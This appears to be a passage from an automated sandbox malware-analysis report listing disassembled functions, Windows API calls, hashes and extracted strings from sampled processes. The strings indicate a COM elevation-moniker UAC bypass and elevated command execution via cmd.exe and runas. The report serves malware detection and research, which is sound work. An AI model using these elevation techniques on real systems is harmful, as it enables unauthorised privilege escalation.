                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad$HandleModule
                                                                                                                                                                      • String ID: advapi32.dll$kernel32.dll$ntdll.dll
                                                                                                                                                                      • API String ID: 2593893887-1356967432
                                                                                                                                                                      • Opcode ID: 77f18392bb993366c1df7b453053b3aeb51cb4a2013aefc10122c1c1374fb3f4
                                                                                                                                                                      • Instruction ID: ca720bcfbdb204521244a6d16e88fbee784b87e4b750a5d7fd7297a05bd30f3d
                                                                                                                                                                      • Opcode Fuzzy Hash: 77f18392bb993366c1df7b453053b3aeb51cb4a2013aefc10122c1c1374fb3f4
                                                                                                                                                                      • Instruction Fuzzy Hash: DC511DF2D10210EFD304BFA1BCC28393AB5E649305744457FF985A72A1F6B9A9448B6B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00405312 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlNtStatusToDosError.NTDLL(C0000023), ref: 004037E8
                                                                                                                                                                      • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 004037EF
                                                                                                                                                                      • RtlInitUnicodeString.NTDLL(?,00007FFD), ref: 00408342
                                                                                                                                                                      • RtlExpandEnvironmentStrings_U.NTDLL(00000000,?,?,00000000), ref: 00408372
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Error$EnvironmentExpandInitLastRestoreStatusStringStrings_UnicodeWin32
                                                                                                                                                                      • String ID: #
                                                                                                                                                                      • API String ID: 4202685462-1885708031
                                                                                                                                                                      • Opcode ID: d2950aec320787fbfdd949c7a338a73876b2f1d301fb6a4be3977a861f702f93
                                                                                                                                                                      • Instruction ID: 2625ad76528c3a05819e41784e94355af3192e6a8ec1aace2841fc774e878e1c
                                                                                                                                                                      • Opcode Fuzzy Hash: d2950aec320787fbfdd949c7a338a73876b2f1d301fb6a4be3977a861f702f93
                                                                                                                                                                      • Instruction Fuzzy Hash: D5115175D14209EFDB14DFE4C984AAEBB79EF08301F10856AE915B32C0EB789705CB56
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00409727 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: $$Elevation:Administrator!new:
                                                                                                                                                                      • API String ID: 0-4251798642
                                                                                                                                                                      • Opcode ID: 62b649c32f93d2337679038de5d7ba034d8f130c97f012f79e63509bd4f77841
                                                                                                                                                                      • Instruction ID: 0ae50f5eb3c30b6def060569edfd5a96dae8f03997bbe75f6d7b2be729599e56
                                                                                                                                                                      • Opcode Fuzzy Hash: 62b649c32f93d2337679038de5d7ba034d8f130c97f012f79e63509bd4f77841
                                                                                                                                                                      • Instruction Fuzzy Hash: B31154B1C1020CABCB10EF94DD85AEE7778AB54305F14456AFA097A181E738EB44CBA5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040D17F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CoGetObject.OLE32(?,00000024,?,?), ref: 0040D1EB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Object
                                                                                                                                                                      • String ID: $$Elevation:Administrator!new:
                                                                                                                                                                      • API String ID: 2936123098-4251798642
                                                                                                                                                                      • Opcode ID: 69272883a17b5f6f07e2d21893714d2c4baf9a1707031f0601c46702adeeea6a
                                                                                                                                                                      • Instruction ID: b31a3ccbf289bc63fcd2c03f84205c468a6b0dd351633bc6c62a4601e098767b
                                                                                                                                                                      • Opcode Fuzzy Hash: 69272883a17b5f6f07e2d21893714d2c4baf9a1707031f0601c46702adeeea6a
                                                                                                                                                                      • Instruction Fuzzy Hash: 140162B2810208ABCB05EF90DC95DDE7B78AB18305F08455EF9057A181EB39E748CB75
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004063CE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00405C4C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                        • Part of subcall function 00405C4C: LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                        • Part of subcall function 00405C4C: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 00409C94
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040A945
                                                                                                                                                                        • Part of subcall function 00405312: RtlInitUnicodeString.NTDLL(?,00007FFD), ref: 00408342
                                                                                                                                                                        • Part of subcall function 00405312: RtlExpandEnvironmentStrings_U.NTDLL(00000000,?,?,00000000), ref: 00408372
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$ChangeCloseEnvironmentExitExpandFindFreeInitLocalNotificationOpenStringStrings_TokenUnicode
                                                                                                                                                                      • String ID: %systemroot%\system32\cmd.exe$/C
                                                                                                                                                                      • API String ID: 1629495445-3057154508
                                                                                                                                                                      • Opcode ID: e58d919228d2999fb42e63e86339d7c771dc9b38e1630fc07efea9b8c1ce01d4
                                                                                                                                                                      • Instruction ID: 6885a5c3f576ce6d6f9b2f3c688c14414178aeb406d1450dcc701d4c4953fbe4
                                                                                                                                                                      • Opcode Fuzzy Hash: e58d919228d2999fb42e63e86339d7c771dc9b38e1630fc07efea9b8c1ce01d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 88F0A4F280030866CB10EB70DC46FDA33389B14305F0045BAB609B60C2EE7997C88AAD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004050A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlInitUnicodeString.NTDLL(?,005C0000), ref: 004050CC
                                                                                                                                                                      • RtlInitUnicodeString.NTDLL(?,explorer.exe), ref: 004050DE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InitStringUnicode
                                                                                                                                                                      • String ID: explorer.exe
                                                                                                                                                                      • API String ID: 4228678080-3187896405
                                                                                                                                                                      • Opcode ID: 7d548acef704560823f98ce8b990f017fce1fd689d344c9a11bc31deb3c59b97
                                                                                                                                                                      • Instruction ID: 050ed0569a6514cfdb40d37d4b6a842c1993e2635d6f26a1999b978f90a0d4ff
                                                                                                                                                                      • Opcode Fuzzy Hash: 7d548acef704560823f98ce8b990f017fce1fd689d344c9a11bc31deb3c59b97
                                                                                                                                                                      • Instruction Fuzzy Hash: BAF09074204248EFCB04CF54C880E6ABBA6FB49304F20855AFC0597381C674ED91CB9A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00423C04 Relevance: 21.4, APIs: 14, Instructions: 395COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 386 423c04-423c38 387 423c3a-423c3b 386->387 388 423c6c-423c83 call 423b60 386->388 390 423c3d-423c59 call 40b434 387->390 394 423ce4-423ce9 388->394 395 423c85 388->395 413 423c5b-423c63 390->413 414 423c68-423c6a 390->414 396 423ceb 394->396 397 423d1f-423d24 394->397 398 423c8b-423c8e 395->398 399 423d48-423d58 395->399 403 423cf1-423cf9 396->403 404 423fa9-423fb1 396->404 407 424092-4240a0 IsIconic 397->407 408 423d2a-423d2d 397->408 405 423c90 398->405 406 423cbd-423cc0 398->406 401 423d63-423d6b call 42418c 399->401 402 423d5a-423d5f 399->402 410 42414a-424152 401->410 415 423d70-423d78 call 4241d4 402->415 416 423d61-423d84 call 423b7c 402->416 418 423f0b-423f32 SendMessageA 403->418 419 423cff-423d04 403->419 409 423fb7-423fc2 call 4181d8 404->409 404->410 421 423c96-423c99 405->421 422 423dee-423dfe call 423b7c 405->422 411 423da1-423da8 406->411 412 423cc6-423cc7 406->412 407->410 420 4240a6-4240b1 GetFocus 407->420 423 423d33-423d34 408->423 424 4240ce-4240e3 call 424848 408->424 409->410 474 423fc8-423fd7 call 4181d8 IsWindowEnabled 409->474 427 424169-42416f 410->427 411->410 436 423dae-423db5 411->436 437 423f37-423f3e 412->437 438 423ccd-423cd0 412->438 413->427 414->388 414->390 415->410 416->410 418->410 439 424042-42404d 419->439 440 423d0a-423d0b 419->440 420->410 431 4240b7-4240c0 call 41efec 420->431 432 423e16-423e32 PostMessageA call 423b7c 421->432 433 423c9f-423ca2 421->433 422->410 425 4240e5-4240ec 423->425 426 423d3a-423d3d 423->426 424->410 454 424103-424116 call 424524 425->454 455 4240ee-424101 call 4244cc 425->455 443 423d43 426->443 444 424118-42411f 426->444 431->410 487 4240c6-4240cc SetFocus 431->487 432->410 451 423ca8-423cab 433->451 452 423e9d-423ea4 433->452 436->410 457 423dbb-423dc1 436->457 437->410 447 423f44-423f49 call 404e54 437->447 458 423cd6-423cd9 438->458 459 423e37-423e57 call 423b7c 438->459 439->410 445 424053-424065 439->445 460 423d11-423d14 440->460 461 42406a-424075 440->461 462 424143-424144 call 423b7c 443->462 478 424132-424141 444->478 479 424121-424130 444->479 445->410 447->410 469 423cb1-423cb2 451->469 470 423dc6-423dd4 IsIconic 451->470 471 423ea6-423eb9 call 423b0c 452->471 472 423ed7-423ee8 call 423b7c 452->472 454->410 455->410 457->410 475 423e03-423e11 call 424170 458->475 476 423cdf 458->476 501 423e7b-423e98 call 423a7c PostMessageA 459->501 502 423e59-423e76 call 423b0c PostMessageA 459->502 480 423d1a 460->480 481 423f4e-423f56 460->481 461->410 463 42407b-42408d 461->463 510 424149 462->510 463->410 488 423cb8 469->488 489 423d89-423d91 469->489 495 423de2-423de9 call 423b7c 470->495 496 423dd6-423ddd call 423bb8 470->496 515 423ecb-423ed2 call 423b7c 471->515 516 423ebb-423ec5 call 41ef50 471->516 520 423eea-423ef8 call 41ee9c 472->520 521 423efe-423f06 call 423a7c 472->521 474->410 517 423fdd-423fec call 4181d8 IsWindowVisible 474->517 475->410 476->462 478->410 479->410 480->462 481->410 486 423f5c-423f63 481->486 486->410 503 423f69-423f78 call 4181d8 IsWindowEnabled 486->503 487->410 488->462 489->410 504 423d97-423d9c call 422c44 489->504 495->410 496->410 501->410 502->410 503->410 532 423f7e-423f94 call 412308 503->532 504->410 510->410 515->410 516->515 517->410 538 423ff2-42403d GetFocus call 4181d8 SetFocus call 415238 SetFocus 517->538 520->521 521->410 532->410 541 423f9a-423fa4 532->541 538->410 541->410
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9f7cd5b534a00e173646c3259e1edb6b7a93c2d3e12613b4fe24a550b71eb0ad
                                                                                                                                                                      • Instruction ID: 2c29f6787255d97ab3f4589ac6aadd45d54e60a31d0a4dda1db310adca3c7782
                                                                                                                                                                      • Opcode Fuzzy Hash: 9f7cd5b534a00e173646c3259e1edb6b7a93c2d3e12613b4fe24a550b71eb0ad
                                                                                                                                                                      • Instruction Fuzzy Hash: 60E18031700124DFD710DF69E989A6E77F4EB54305FA580AAE4059B3A2C73CEE91EB09
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00477F98 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 94COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00477E04: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,022E2BD8,?,?,?,022E2BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E1D
                                                                                                                                                                        • Part of subcall function 00477E04: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477E23
                                                                                                                                                                        • Part of subcall function 00477E04: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,022E2BD8,?,?,?,022E2BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E36
                                                                                                                                                                        • Part of subcall function 00477E04: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,022E2BD8,?,?,?,022E2BD8), ref: 00477E60
                                                                                                                                                                        • Part of subcall function 00477E04: GetFinalPathNameByHandleA.KERNELBASE(00000000,?,00001000,00000000,00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,022E2BD8), ref: 00477E79
                                                                                                                                                                        • Part of subcall function 00477E04: CloseHandle.KERNEL32(00000000,?,?,?,022E2BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E7E
                                                                                                                                                                        • Part of subcall function 00477EDC: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00477F6E,?,?,?,022E2BD8,?,00477FD0,00000000,004780E6,?,?,-00000010,?), ref: 00477F0C
                                                                                                                                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00478020
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,004780E6,?,?,-00000010,?), ref: 00478029
                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00478076
                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 0047809A
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,004780CB,00000000,00000000,000000FF,000000FF,00000000,004780C4,?,00000000,004780E6,?,?,-00000010,?), ref: 004780BE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitFinalLastModuleMultipleNameObjectsPathProcProcessShellWait
                                                                                                                                                                      • String ID: =G$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                                                                                                      • API String ID: 1110972819-2356621170
                                                                                                                                                                      • Opcode ID: a5adbdbf38bb24294ca84573da8a434c1ec028ae218061afba455555d162e3c3
                                                                                                                                                                      • Instruction ID: f917ad2a0ddd76f9e2927b7da1bf40d86712eb5f256f3455e7a65403f61927fd
                                                                                                                                                                      • Opcode Fuzzy Hash: a5adbdbf38bb24294ca84573da8a434c1ec028ae218061afba455555d162e3c3
                                                                                                                                                                      • Instruction Fuzzy Hash: 6A317670A40648AFDB10EFA6C845ADE76B8EB09318F91847FF518E7281DB7C4909CB59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00408558 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                      • Opcode ID: 13731be40deedddb1bcfa8ff428b7afeb94bbc36fd170698d9f0ebbe8ddb7d61
                                                                                                                                                                      • Instruction ID: c2e77f62f7768c8d819fe5e4f890f04d0c30465c7a0250885ae4f210fddfc08b
                                                                                                                                                                      • Opcode Fuzzy Hash: 13731be40deedddb1bcfa8ff428b7afeb94bbc36fd170698d9f0ebbe8ddb7d61
                                                                                                                                                                      • Instruction Fuzzy Hash: 9BE0927170021466D311A96A9C86AEAB35C975C314F00427FBA84E73C2EDB89E4146A9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00423B7C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424149,?,00000000,00424154), ref: 00423BA6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: NtdllProc_Window
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4255912815-0
                                                                                                                                                                      • Opcode ID: 48edabf631f81993959cac3a7e5f7459cd1392ebb1ce9be3f782214e3b303982
                                                                                                                                                                      • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                                                                                                                      • Opcode Fuzzy Hash: 48edabf631f81993959cac3a7e5f7459cd1392ebb1ce9be3f782214e3b303982
                                                                                                                                                                      • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042E094 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 178memorylibraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0CE
                                                                                                                                                                      • GetVersion.KERNEL32(00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0EB
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E104
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E10A
                                                                                                                                                                      • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11F
                                                                                                                                                                      • FreeSid.ADVAPI32(00000000,0042E27F,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E272
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                                                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                      • API String ID: 2252812187-1888249752
                                                                                                                                                                      • Opcode ID: bd2818d045df884b656eeebf64c70713654d524edf7db94a41cfac955bff9082
                                                                                                                                                                      • Instruction ID: a71ca61110966f780236f7e78469af046a056b7130da329bb4013a210d9377b5
                                                                                                                                                                      • Opcode Fuzzy Hash: bd2818d045df884b656eeebf64c70713654d524edf7db94a41cfac955bff9082
                                                                                                                                                                      • Instruction Fuzzy Hash: 65519371B44615EAEF10EAE69C42FBF77ACEB19304F9404BBB901F7281D57899008A79
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00483038 Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
